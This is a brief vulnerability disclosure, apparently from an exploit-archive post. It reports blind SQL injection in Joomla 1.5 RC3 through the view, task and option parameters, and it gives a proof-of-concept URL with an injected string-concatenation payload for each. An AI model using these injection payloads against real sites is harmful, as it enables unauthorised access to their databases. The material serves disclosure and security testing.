Thanks to team of Blind Sql-Injection in Joomla 1.5 RC3 URL : http://localhost/index.php 1. Parameter = view The following changes were applied to the original request: ? Set parameter 'view's value to 'somechars'%20+%20'article' POC URL : http://localhost/index.php?option=com_content&view=somechars'%20+%20'article&id=25&Itemid=28 This test uses several different HTTP requests in order to verify the existence of a Blind SQL Injection vulnerability. The resulting test responses show that requests containing conditions with the same logical values were identical to the original valid response, and the responses with different values were not. This indicates that an SQL query is being executed at the back-end database, and that the injected values affect the original query 2. Parameter = task The following changes were applied to the original request: ? Set parameter 'task's value to 'somechars%27+%2B+%27search' POC URL : http://localhost/index.php?searchword=&task=somechars%27+%2B+%27search&option=com_search 3. Parameter = option The following changes were applied to the original request: ? Set parameter 'option's value to 'somechars%27+%2B+%27com_search' POC URL :http://localhost/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search ~~~~~~~~~~mail : beenudel1986@xxxxxxxxx~~~~~~~~~~~~~~~~ greetz to : d3, baltazar , Zugzwang , icqbomber